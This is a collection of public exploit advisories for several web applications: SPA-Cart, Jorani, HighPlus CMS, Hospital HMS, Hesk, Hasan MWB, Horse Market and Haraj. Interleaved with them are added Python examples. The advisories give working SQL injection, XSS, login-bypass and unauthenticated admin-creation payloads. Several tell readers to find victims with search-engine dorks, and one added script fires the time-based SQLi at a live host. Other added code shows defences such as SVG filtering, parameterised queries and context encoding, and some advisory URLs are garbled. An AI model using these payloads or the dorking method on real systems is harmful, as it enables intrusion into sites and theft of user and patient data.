<pre><code># Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 20/08/2023<br /># Vendor: SPA-Cart<br /># Vendor Homepage: https://spa-cart.com/<br /># Software Link: https://demo.spa-cart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4548<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection can allow unauthorized access to sensitive data, modification of data, and<br />crashing the application or making it unavailable, leading to lost revenue and damage to a<br />company's reputation.<br /><br /><br />Path: /search<br /><br />GET parameter 'filter[brandid]' is vulnerable to SQL Injection<br /><br />https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black<br /><br />The injection is time-based blind: nothing from the query is echoed in the page, but when MySQL<br />evaluates the payload below the response is delayed by the SLEEP() value, and that delay is the<br />oracle used to confirm it.<br /><br />---<br />Parameter: filter[brandid] (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black<br />---<br /><br /><br />[-] Done<br /></code></pre>
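Added example (not part of the advisory above): a small Python script that reproduces the advisory's /search request and XOR/SLEEP payload and confirms the time-based oracle the way a tester should, by interleaving baseline and delayed requests and comparing medians, so one slow response caused by network jitter is not mistaken for an injection. The host `https://website` is the advisory's own placeholder; the assumption that the parameter lands inside a single-quoted SQL literal is taken from the quoting of the advisory's payload.

```python
"""Confirm a time-based blind SQL injection against a baseline.

Added example for the SPA-Cart advisory; not the vendor's or the author's code.
The host below is the advisory's placeholder.
"""
import statistics
import time
import urllib.parse
import urllib.request
from typing import Callable, Sequence

BASE_URL = "https://website/search"  # placeholder host from the advisory

# The other query parameters exactly as they appear in the advisory's URL.
FIXED_PARAMS = {
    "filtered": "1",
    "q": "11",
    "load_filter": "1",
    "filter[price]": "100-500",
    "filter[attr][Memory][]": "500 GB",
    "filter[attr][Color][]": "Black",
}


def sleep_payload(seed: str, seconds: int) -> str:
    """The advisory's payload with a configurable delay.

    Assumption: the server drops the value into a single-quoted literal, so the
    WHERE clause becomes
        brandid = '4' XOR (SELECT 0 FROM (SELECT SLEEP(n)) a) XOR 'Z'
    MySQL evaluates the derived table, so the response arrives n seconds late
    while the statement itself stays syntactically valid.
    """
    return f"{seed}'XOR(SELECT(0)FROM(SELECT(SLEEP({seconds})))a)XOR'Z"


def build_url(brandid: str, base: str = BASE_URL) -> str:
    """Assemble the search URL with a chosen filter[brandid] value."""
    params = dict(FIXED_PARAMS)
    params["filter[brandid]"] = brandid
    return base + "?" + urllib.parse.urlencode(params)


def timed_get(url: str, timeout: float = 30.0) -> float:
    """Return the wall-clock seconds one GET took; the body is irrelevant."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass  # an error page still tells us how long the server held the request
    return time.monotonic() - start


def is_time_based_blind(baseline: Sequence[float], delayed: Sequence[float],
                        seconds: float, slack: float = 0.5) -> bool:
    """Oracle decision: the median delayed time must exceed the median baseline
    by (almost) the full SLEEP value. Medians absorb a single outlier."""
    return statistics.median(delayed) - statistics.median(baseline) >= seconds - slack


def confirm(fetch: Callable[[str], float] = timed_get, seconds: int = 7,
            rounds: int = 3) -> bool:
    """Interleave baseline and delayed requests, then apply the oracle."""
    baseline, delayed = [], []
    for _ in range(rounds):
        baseline.append(fetch(build_url("4")))
        delayed.append(fetch(build_url(sleep_payload("4", seconds))))
    return is_time_based_blind(baseline, delayed, seconds)


if __name__ == "__main__":
    print("injectable" if confirm() else "no consistent timing difference")
```

Point `BASE_URL` at a real installation to run it; the `fetch` parameter exists so the decision logic can be exercised offline with a stub.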
<pre><code># Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 20/08/2023<br /># Vendor: SPA-Cart<br /># Vendor Homepage: https://spa-cart.com/<br /># Software Link: https://demo.spa-cart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4547<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing the malicious URL in an email or instant message;<br />the script it injects then runs in the victim's browser in the site's origin and can perform a wide<br />variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /search<br /><br />GET parameter 'filter[brandid]' is vulnerable to XSS<br />GET parameter 'filter[price]' is vulnerable to XSS<br /><br />https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB<br /><br /><br />XSS Payloads:<br /><br />vnxjb"><script>alert(1)</script>bvu51<br /><br />The payload's leading "> closes the double-quoted attribute in which the parameter is reflected,<br />so the script tag that follows is parsed as markup.<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Horse Market Sell & Rent Portal Script V1.5.7 XSS via File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Telegram : @indoushka |<br />| # Tested on : Windows 10 Pro (French) |<br />| # Vendor : https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725 | <br />| # Dork : "InfinityMarket MultiPurpose Script is a multi-solution product made with simplicity in mind so you can benefit " |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] Sign up for a user account and go to /index.php/frontend/myprofile/en#content<br /><br />[+] Choose an SVG file that contains a script and upload it.<br /><br />[+] Open the uploaded file directly, e.g. http://localhost/files/index.svg : the browser renders the SVG as a document and executes the script it contains in the site's origin.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
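Added example, not the Horse Market project's code: an SVG is an XML document, and a browser navigated straight to it (as with the /files/index.svg URL above) runs any script element, on* event handler or javascript: link it carries, in the origin that serves it. The checker below walks the XML tree and flags those constructs so an upload handler can reject the file; the two sample files are constructed for this example.

```python
"""Flag active content in an uploaded SVG before it is stored and served.

Added example for the Horse Market advisory; not the project's code.
"""
import xml.etree.ElementTree as ET
from typing import List

# Elements that execute or embed code when the SVG is opened as a document.
ACTIVE_ELEMENTS = ("script", "foreignobject", "iframe", "embed", "object")


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def svg_active_content(data: bytes) -> List[str]:
    """Return a list of findings; an empty list means nothing active was seen."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]

    findings: List[str] = []
    for elem in root.iter():          # document order, root first
        name = _local(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):            # onload, onclick, onmouseover ...
                findings.append(f"{aname} handler on <{name}>")
            if aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: href on <{name}>")
    return findings


def accept_upload(data: bytes) -> bool:
    """Policy an upload handler could apply: reject anything with findings."""
    return not svg_active_content(data)


# Constructed for the example: the kind of file the profile upload step accepts.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <script>alert(document.domain)</script>
  <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(2)">
    <text y="20">click</text>
  </a>
</svg>"""

# Constructed for the example: an ordinary image with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", svg_active_content(blob) or "clean")
```

Rejecting on findings is the narrow fix. The robust one does not depend on inspecting the format at all: serve user uploads from a separate origin, or with `Content-Disposition: attachment`, so that even a script-bearing SVG never executes in the application's origin.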
<pre><code>## Title: Jorani v1.0.3 (©2014-2023 Benjamin BALET) - Reflected XSS / Information Disclosure<br />## Author: nu11secur1ty<br />## Date: 08/27/2023<br />## Vendor: https://jorani.org/<br />## Software: https://demo.jorani.org/session/login<br />## Reference: https://portswigger.net/web-security/cross-site-scripting<br />## Reference: https://portswigger.net/web-security/information-disclosure<br /><br />## Description:<br />The value of the `language` request parameter is copied into a JavaScript string<br />encapsulated in double quotation marks. The payload `75943";alert(1)//569` submitted<br />in the `language` parameter was echoed unmodified in the application's response, so<br />the `"` terminates the string literal and the rest is parsed as script. The request<br />below submits a markup-breakout variant, `"><script>alert(document.cookie)</script>`,<br />in the same parameter.<br />The response to that request also carries PHP error output, which discloses the PHP<br />version and the installation's filesystem path (/home/decouvric/demo.jorani.org/...).<br />Note that `jorani_session` is set with HttpOnly in the response, so `document.cookie`<br />exposes only `csrf_cookie_jorani`; the session cookie itself is not readable by the<br />injected script.<br /><br />STATUS: HIGH-Vulnerability<br /><br />[+]Exploit:<br />```POST<br />POST /session/login HTTP/1.1<br />Host: demo.jorani.org<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK<br />Origin: http://demo.jorani.org<br />Upgrade-Insecure-Requests: 1<br />Referer: http://demo.jorani.org/session/login<br />Content-Type: application/x-www-form-urlencoded<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 183<br /><br />csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=<br /><br />```<br /><br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />date: Sun, 27 Aug 2023 06:03:04 GMT<br />content-type: text/html; charset=UTF-8<br />Content-Length: 681<br />server: Apache<br />x-powered-by: PHP/8.2<br />expires: Thu, 19 Nov 1981 08:52:00 GMT<br />cache-control: no-store, no-cache, must-revalidate<br />pragma: no-cache<br />set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; SameSite=Strict<br />set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax<br />last-modified: Sun, 27 Aug 2023 06:03:04 GMT<br />vary: Accept-Encoding<br />cache-control: private, no-cache, no-store, proxy-revalidate, no-transform, must-revalidate<br />pragma: no-cache<br />x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1<br />x-iplb-instance: 27474<br />connection: close<br /><br /><br /><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><br /><br /><h4>A PHP Error was encountered</h4><br /><br /><p>Severity: 8192</p><br /><p>Message: strlen(): Passing null to parameter #1 ($string) of type string is deprecated</p><br /><p>Filename: controllers/Connection.php</p><br /><p>Line Number: 126</p><br /><br /><br /></div><br /><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><br /><br /><h4>A PHP Error was encountered</h4><br /><br /><p>Severity: Warning</p><br /><p>Message: Cannot modify header information - headers already sent by (output started at /home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><br /><p>Filename: helpers/url_helper.php</p><br /><p>Line Number: 565</p><br /><br /><br /></div><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)<br /><br />## Time spent:<br />01:35:00<br /><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HighPlus CMS v0.1.3 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : http://highplus.co.th/Highplus/login/AFMADS001.php | <br />====================================================================================================================================<br /><br /><br />PoC :<br /><br />[+] Find targets with Google or another search engine.<br /><br />[+] Use the payload ' or 0=0 # as both the username and the password: the quote closes the literal in the login query, or 0=0 makes the condition true for every row, and # (MySQL comment syntax) discards the remainder of the query.<br /><br />[+] http://127.0.0.1wwwhighpluscoth/main/login.html<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : Hospital HMS v2.7 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : http://apptmedical.com/ | <br />| # Dork : © 2018 HMS. All rights reserved |<br />======================================================================================================================================<br /><br /><br />PoC :<br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] Use the username admin with the password '=' 'or' on any of the three login forms below.<br /><br />[+] User login : http://target_site/hms/user-login.php<br /><br />[+] Doctor login : http://target_site/hms/doctor/<br /><br />[+] Admin login : http://target_site/hms/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : Hospital HMS v2 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : http://p30vel.ir | <br />======================================================================================================================================<br /><br /><br />PoC :<br /><br />[+] Find targets with Google or another search engine.<br /><br />[+] Username : admin'-- -   Password : indoushka (any value works; the -- comment removes the password check from the query)<br /><br />[+] http://www127.0.0.1/arvindbijaniyacom/admin/admin_pannel/view_service/index.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
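Added example covering the three authentication-bypass advisories above (HighPlus CMS v0.1.3, Hospital HMS v2.7 and Hospital HMS v2). It is not code from any of those products: the schema and the single account are constructed here, and the login query is the string-concatenation pattern that all three payloads assume, shown beside the parameterised query that defeats them. SQLite understands the `--` comment, so the HMS v2 payload `admin'-- -` is run verbatim; the HighPlus payload ends in `#`, which is a comment only in MySQL, so it is run with `--` in its place; the HMS v2.7 payload `'=' 'or'` relies on MySQL comparing the integer result of `password=''` with the string `' '` (which MySQL converts to 0), a coercion SQLite does not perform, so it is listed but not reproduced.

```python
"""Vulnerable vs parameterised login query, exercised with the page's payloads.

Added example for the HighPlus / Hospital HMS auth-bypass advisories; the
schema, account and query shape are constructed assumptions, not vendor code.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """One admin account, constructed for the example (plaintext so the query stays legible)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    con.execute("INSERT INTO users (username, password, role) VALUES ('admin', 'S3cret!', 'admin')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """The pattern behind all three advisories: inputs spliced into the SQL text.

    A quote in the input ends the literal; `--` comments out the password check;
    `or 0=0` makes the WHERE clause true for every row. Returns the matched role.
    """
    sql = ("SELECT role FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Placeholders send the values separately from the SQL text, so quotes and
    comment markers in the input are just characters to compare against."""
    sql = "SELECT role FROM users WHERE username=? AND password=?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# (username, password) as typed into the login form.
PAYLOADS = {
    "HMS v2 (verbatim)": ("admin'-- -", "indoushka"),
    "HighPlus (# replaced by -- for SQLite)": ("' or 0=0 --", "' or 0=0 --"),
}
# HMS v2.7 payload, MySQL-only coercion trick, listed for completeness:
MYSQL_ONLY_PAYLOAD = ("admin", "'=' 'or'")

if __name__ == "__main__":
    con = make_db()
    for label, (user, pw) in PAYLOADS.items():
        print(f"{label}: concatenated -> {login_vulnerable(con, user, pw)!r}, "
              f"parameterised -> {login_safe(con, user, pw)!r}")
```

Parameterisation is what closes the injection; a real login handler would additionally compare a password hash rather than a stored plaintext, which is out of scope for the bypass shown here.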
<pre><code>====================================================================================================================================<br />| # Title : Hesk Rtl CMS v1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://p30vel.ir |<br />| # Dork : فارسی سازی توسط وحید مجیدی / اسکریپت دات کام (Persian: "Persian localization by Vahid Majidi / Script Dot Com") |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] This vulnerability affects /Hesk/ajax.php.<br /><br />[+] Attack details :<br /><br /> The request URI was set to ;997612"():;991161<br /> The input is reflected inside a <script> tag between double quotes, i.e. inside a JavaScript string literal: the injected " closes the string and what follows it is parsed as code.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hasan MWB v1 - XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 65.0 (32-bit) |<br />| # Vendor : http://sourceforge.net/ |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Find targets with Google or another search engine.<br /><br />[+] Use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt><br /><br />[+] Go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br /> The payload's </title> shows where the q parameter is reflected: closing the page title early lets the script tag that follows be parsed as markup.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
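Added example serving the four reflected-XSS advisories on this page (SPA-Cart `filter[brandid]`, Jorani `language`, Hesk ajax.php and Hasan MWB `q`). It is not code from any of those projects. Each probe is placed in the output context its advisory describes: a double-quoted HTML attribute, a double-quoted JavaScript string inside an inline script, and the page title. The `vulnerable_*` functions stand in for templates that echo the parameter unencoded; the `safe_*` functions encode for the context they write into, which is the point of showing three contexts side by side: one escaping routine does not fit all of them.

```python
"""Reflected-XSS probes from this page in their contexts, beside context-correct encoding.

Added example; not code from SPA-Cart, Jorani, Hesk or Hasan MWB. The
surrounding markup in each function is an assumption standing in for the
affected template.
"""
import html
import json

# Probes copied from the advisories on this page.
ATTR_PROBE = 'vnxjb"><script>alert(1)</script>bvu51'            # SPA-Cart, filter[brandid]
JS_PROBE = '75943";alert(1)//569'                              # Jorani, language
JS_PROBE_2 = ';997612"():;991161'                              # Hesk, request URI
TITLE_PROBE = '1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>'  # Hasan MWB, q


# 1. Double-quoted HTML attribute (SPA-Cart's search form echoes the filter).
def vulnerable_attr(value: str) -> str:
    return f'<input name="filter[brandid]" value="{value}">'


def safe_attr(value: str) -> str:
    # quote=True turns " into &quot;, so the value can never close the attribute.
    return f'<input name="filter[brandid]" value="{html.escape(value, quote=True)}">'


# 2. Double-quoted string literal inside an inline <script> (Jorani, Hesk).
def vulnerable_js(value: str) -> str:
    return f'<script>var language = "{value}";</script>'


def js_string_literal(value: str) -> str:
    """json.dumps escapes " and \\ so the literal cannot be terminated early.

    The HTML parser knows nothing of JavaScript string syntax, so a literal
    </script> inside the string would still end the script block; escaping the
    slash ("<\\/") keeps it the same string for JavaScript and harmless as HTML.
    """
    return json.dumps(value).replace("</", "<\\/")


def safe_js(value: str) -> str:
    return f'<script>var language = {js_string_literal(value)};</script>'


def js_roundtrip_ok(value: str) -> bool:
    """Self-check: json.loads (JavaScript accepts the same escapes) reads the literal back unchanged."""
    return json.loads(js_string_literal(value)) == value


# 3. <title> content is RCDATA: tags inside it are not parsed, but a literal
#    </title> ends it and everything after is parsed as markup again (Hasan MWB).
def vulnerable_title(value: str) -> str:
    return f'<title>Search: {value}</title>'


def safe_title(value: str) -> str:
    # Escaping < to &lt; is enough here: the only way out of RCDATA is a literal </title>.
    return f'<title>Search: {html.escape(value)}</title>'


if __name__ == "__main__":
    for label, probe, bad, good in [
        ("attribute", ATTR_PROBE, vulnerable_attr, safe_attr),
        ("js string", JS_PROBE, vulnerable_js, safe_js),
        ("js string", JS_PROBE_2, vulnerable_js, safe_js),
        ("title", TITLE_PROBE, vulnerable_title, safe_title),
    ]:
        print(f"[{label}] vulnerable: {bad(probe)}")
        print(f"[{label}] safe:       {good(probe)}")
```

The Hesk probe `;997612"():;991161` is a detection probe rather than a working payload: once the `"` closes the string, `():;` is a JavaScript syntax error, and that error is what reveals the breakout. The same slot accepts `";alert(1)//` as the Jorani probe shows.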
<pre><code>====================================================================================================================================<br />| # Title : haraj V1.1 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.mediafire.com/file/ky3e6rtnb23mddd/free_haraj_v1.1.zip |<br />| # Dork : V1.1 free برمجة وتصميم : سكربت حراج (Arabic: "Programming and design: Haraj script") |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] Use payload : /setup/install.php?act=user<br /><br />[+] http://127.0.0.1/adplusgq/setup/install.php?act=user<br /><br /> The installer is still reachable after setup; its user step (act=user) lets an unauthenticated visitor create an administrator account.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>